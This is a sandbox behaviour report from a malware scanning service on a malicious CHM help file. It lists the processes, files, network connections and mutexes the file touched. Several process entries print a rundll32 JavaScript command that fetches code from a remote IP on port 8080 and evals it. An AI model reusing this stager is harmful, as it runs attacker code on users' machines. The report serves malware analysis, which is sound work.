VirSCAN


File information
Safety rating: 61
Behavior list
Basic Information
MD5: 8b839dd44d94adc1cc7be3ca34d40221
File type: CHM help file
Production company:
Version:
Shell or compiler information:
Subfile information:
$FIftiMain / c301bab6d33da570e89e7b3ed9d3d539 / Unknown
#SYSTEM / 97c9685278cd5aa8f9698f5b24988f75 / Unknown
#IDXHDR / d1e1ec4adb50da435d932e0e0f65146e / Unknown
$OBJINST / 81cabeada2fee00893dbd17ac173c907 / Unknown
BTree / c805773ee52688961346c7d41eb464e5 / Unknown
hta(msiexec)不弹窗.html / 0c3c1a0115ecae5ec2218265810b1bd7 / Unknown
TOC-Created-By-Easy-CHM.HHC / 5089c0ed5f646a86e1366c6a584d13f8 / Unknown
Index-Created-By-Easy-CHM.HHK / 85fe2c13b458cced48342f49c187d49e / Unknown
#WINDOWS / 16d03a483ea3bc0d493751308c4b3f38 / Unknown
#STRINGS / d53cad39401b9e6486c8ce49be22814f / Unknown
#URLSTR / edfa5194eeac89a9553575ec78686ba0 / Unknown
#TOPICS / 964db660d9ed637297d6efc2e772cac4 / Unknown
#URLTBL / 33f15c84af65de19e0dfb20bbaffedf5 / Unknown
Property / eea896b7533e6178258893a58505d73e / Unknown
Data / 89be2a5b0eb8892255d222b8eb46cc39 / Unknown
Map / 86299d74b00af81f597352245a4a9ca1 / Unknown
Property / f1d3ff8443297732862df21dc4e57262 / Unknown
$WWAssociativeLinksdumpFile / d41d8cd98f00b204e9800998ecf8427e / Unknown
#ITBITS / d41d8cd98f00b204e9800998ecf8427e / Unknown
Key behavior
Behavior description: Force-kills a process repeatedly
details:C:\WINDOWS\system32\rundll32.exe
Behavior description: Sets special folder attributes
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: Kills a process
details:TASKKILL = taskkill /f /im rundll32.exe
C:\WINDOWS\system32\rundll32.exe
Process behavior
Behavior description: Creates a process with a hidden window
details:ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
Behavior description: Creates a process
details:[0x00000a68]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000a9c]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000aa4]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000c0c]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000c34]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000c44]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000c58]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000c80]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000cb4]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000cbc]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000cec]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000d1c]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000d24]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000d38]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000d68]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
Behavior description: Force-kills a process repeatedly
details:C:\WINDOWS\system32\rundll32.exe
Behavior description: Creates a local thread
details:TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2588, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2628, StartAddress = 6359727B, Parameter = 001B0750
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2632, StartAddress = 77E56C7D, Parameter = 041E0600
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2636, StartAddress = 769AE43B, Parameter = 0446C180
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2672, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2680, StartAddress = 6359727B, Parameter = 00D9B5E0
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2684, StartAddress = 77E56C7D, Parameter = 0016FA90
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2688, StartAddress = 769AE43B, Parameter = 00E15B38
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2732, StartAddress = 77E56C7D, Parameter = 000EAC28
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2736, StartAddress = 769AE43B, Parameter = 000ED5C8
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2740, StartAddress = 77E56C7D, Parameter = 000EDD50
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3092, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3096, StartAddress = 6359727B, Parameter = 00D9B5E0
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3100, StartAddress = 77E56C7D, Parameter = 0016FA90
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3104, StartAddress = 769AE43B, Parameter = 00E15B38
Behavior description: Kills a process
details:TASKKILL = taskkill /f /im rundll32.exe
C:\WINDOWS\system32\rundll32.exe
File behavior
Behavior description: Creates a file
details:C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92B1.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92CD.tmp
Behavior description: Deletes a file
details:C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92CD.tmp
Behavior description: Sets special folder attributes
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: Modifies file contents
details:C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 96
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 180
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 240
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp ---> Offset = 84
Behavior description: Searches for a file
details:FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\%temp%\****.chm
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\rundll32.exe
FileName = cmd.*
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\cmd.*
FileName = C:\WINDOWS\system32\cmd.*
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\taskkill.*
Network behavior
Behavior description: Connects to a specified site
details:WinHttpConnect: ServerName = **.76.197.**, PORT = 8080, UserName = , Password = , hSession = 0x019a3100, hConnect = 0x019a3200, Flags = 0x00000000
Behavior description: Opens an HTTP connection
details:WinHttpOpen: UserAgent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), hSession = 0x019a3100
Behavior description: Establishes a connection to a specified socket
details:IP: **.76.197.**:8080, SOCKET = 0x000002b8
IP: **.76.197.**:8080, SOCKET = 0x000002bc
Behavior description: Sends an HTTP packet
details:GET /connect HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: **.76.197.**:8080 Connection: Keep-Alive
Behavior description: Opens an HTTP request
details:WinHttpOpenRequest: **.76.197.**:8080/connect, hConnect = 0x019a3200, hRequest = 0x01a10000, Verb: GET, Referer: , Flags = 0x00000080
Other behavior
Behavior description: Creates a mutex
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\!PrivacIE!SharedMemory!Mutex
MSCTF.Shared.MUTEX.IOH
MSCTF.Shared.MUTEX.APJ
Behavior description: Creates an event object
details:EventName = MSCTF.SendReceive.Event.APJ.IC
EventName = MSCTF.SendReceiveConection.Event.APJ.IC
Behavior description: Opens an event
details:\SECURITY\LSA_AUTHENTICATION_INITIALIZED
CTF.ThreadMIConnectionEvent.000007E8.00000000.0000000F
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.0000000F
MSFT.VSA.COM.DISABLE.2540
MSFT.VSA.IEC.STATUS.6c736db0
_fCanRegisterWithShellService
MSFT.VSA.COM.DISABLE.2664
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
MSCTF.SendReceiveConection.Event.IOH.IKCB
MSCTF.SendReceive.Event.IOH.IKCB
MSFT.VSA.COM.DISABLE.2724
MSCTF.SendReceive.Event.IOH.IC
MSCTF.SendReceiveConection.Event.IOH.IC
MSFT.VSA.COM.DISABLE.3084
Behavior description: Finds a specified window
details:NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,]
NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,]
NtUserFindWindowEx: [Class,Window] = [,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
NtUserFindWindowEx: [Class,Window] = [OleMainThreadWndClass,]
Behavior description: Window information
details:Pid = 2540, Hwnd=0x1033a, Text = test, ClassName = HH Parent.
Behavior description: Adjusts process token privileges
details:SE_LOAD_DRIVER_PRIVILEGE
SE_DEBUG_PRIVILEGE
Behavior description: Enumerates windows
details:N/A
Behavior description: Opens a mutex
details:ShimCacheMutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\!IETld!Mutex
CtfmonInstMutexDefaultS-*